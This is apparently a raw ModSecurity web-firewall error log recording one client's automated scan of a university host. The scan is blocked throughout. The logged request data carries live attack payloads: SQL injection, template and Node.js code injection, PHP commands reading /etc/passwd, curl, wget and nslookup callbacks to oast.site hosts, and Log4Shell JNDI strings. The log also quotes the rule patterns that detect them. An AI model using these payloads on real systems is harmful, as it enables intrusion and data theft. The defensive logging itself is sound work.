[Tue Aug 29 11:31:48.450724 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tMCo-f0AAAQMrv8AAAAu"]
[Tue Aug 29 11:31:49.376387 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQkBYkAAAAC"]
[Tue Aug 29 11:31:50.394691 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAP6NQEAAAAQ"]
[Tue Aug 29 11:31:50.404363 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAQV4QAAAAA3"]
[Tue Aug 29 11:31:50.589067 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgeq3mwkiucm9m4.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlg9zy3b9fcby1kp.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10tsCo-f0AAAQNwJEAAAAv"]
[Tue Aug 29 11:31:51.344926 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibft.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgak441qykiqryo.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgqyatad7dtbkqu.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAQR48QAAAAz"]
[Tue Aug 29 11:31:51.398882 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAQNwJUAAAAv"]
[Tue Aug 29 11:31:51.453161 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAPiBlwAAAAB"]
[Tue Aug 29 11:31:52.612466 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/pages/doenterpagevariables.action"] [unique_id "ZO10uMCo-f0AAAP5mL0AAAAM"]
[Tue Aug 29 11:31:53.348471 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10ucCo-f0AAAP5mMEAAAAM"]
[Tue Aug 29 11:31:53.438691 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/pages/createpage.action"] [unique_id "ZO10ucCo-f0AAAQJWxsAAAAr"]
[Tue Aug 29 11:31:54.316981 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:             (() => {\\x0a         found within ARGS:document:             (() => {\\x0a        const process = clearImmediate.constructor(\\x22return process;\\x22)();\\x0a        const result = process.mainModule.require(\\x22child_process\\x22).execSync(\\x22id > build/css/2Udxkf4l8YMdxIMziw7l7YPgbXU.css\\x22);\\x0a        console.log(\\x22Result: \\x22   result);\\x0a        return true;\\x0a    })()        "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO10usCo-f0AAAN@5LQAAAAO"]
[Tue Aug 29 11:31:54.363451 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/pages/templates2/viewpagetemplate.action"] [unique_id "ZO10usCo-f0AAAP@M4kAAAAZ"]
[Tue Aug 29 11:31:55.410971 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10u8Co-f0AAAQnF5sAAAAF"]
[Tue Aug 29 11:31:56.327736 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/template/custom/content-editor"] [unique_id "ZO10vMCo-f0AAAQMrxsAAAAu"]
[Tue Aug 29 11:31:56.393726 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:mac. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:mac: wget http:/cjmn8l5jmimk2adbbnlg7p7uymanbifgm.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/goform/setmac"] [unique_id "ZO10vMCo-f0AAANsAWQAAAAD"]
[Tue Aug 29 11:31:57.359572 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/templates/editor-preload-container"] [unique_id "ZO10vcCo-f0AAAQkBZ4AAAAC"]
[Tue Aug 29 11:31:58.302886 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /${@ found within ARGS:s: /index/index/name/${@phpinfo()}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10vsCo-f0AAAQJWzIAAAAr"]
[Tue Aug 29 11:31:58.377448 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/users/user-dark-features"] [unique_id "ZO10vsCo-f0AAAP5mNQAAAAM"]
[Tue Aug 29 11:31:58.384914 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:deviceUdid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()(\\x22 found within ARGS:deviceUdid: ${\\x22freemarker.template.utility.Execute\\x22?new()(\\x22cat /etc/hosts\\x22)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/catalog-portal/ui/oauth/verify"] [unique_id "ZO10vsCo-f0AAAQR4@IAAAAz"]
[Tue Aug 29 11:31:59.311313 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:timezone: `nslookup cjmn8l5jmimk2adbbnlgea8tw4uq85tn9.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php/management/set_timezone"] [unique_id "ZO10v8Co-f0AAAQR4@QAAAAz"]
[Tue Aug 29 11:32:04.361194 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fields. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:fields: * from wp_users-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO10xMCo-f0AAAPiBpIAAAAB"]
[Tue Aug 29 11:32:05.495041 2023] [:error] [pid 1083] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')) $ found within ARGS:filter: ' pi(print($a='system')) $a('cat /etc/passwd') '"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/fuel/pages/select/"] [unique_id "ZO10xcCo-f0AAAQ7NGMAAAAH"]
[Tue Aug 29 11:32:06.372316 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:subscribe_topic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:subscribe_topic: 1 union select 1 and sleep(6)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/forum/"] [unique_id "ZO10xsCo-f0AAAQMrzgAAAAu"]
[Tue Aug 29 11:32:06.437605 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/dfsms/index.php"] [unique_id "ZO10xsCo-f0AAAP5mOMAAAAM"]
[Tue Aug 29 11:32:07.782862 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:account_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:account_id: 2'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/dms/admin/accounts/payment_history.php"] [unique_id "ZO10x8Co-f0AAAPiBqEAAAAB"]
[Tue Aug 29 11:32:08.327938 2023] [:error] [pid 1084] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:cfg_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:cfg_id: ;id;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ajax/openvpn/del_ovpncfg.php"] [unique_id "ZO10yMCo-f0AAAQ83QEAAAAI"]
[Tue Aug 29 11:32:10.341064 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlgzshz7yipq639c.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/solr/admin/collections"] [unique_id "ZO10ysCo-f0AAAQnF8EAAAAF"]
[Tue Aug 29 11:32:10.422943 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:action: ${jndi:ldap://${:-738}${:-475}}.${hostName}.uri.cjmn8l5jmimk2adbbnlg9erzgn1oj6sxr.oast.site/}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/solr/admin/cores"] [unique_id "ZO10ysCo-f0AAAQnF8UAAAAF"]
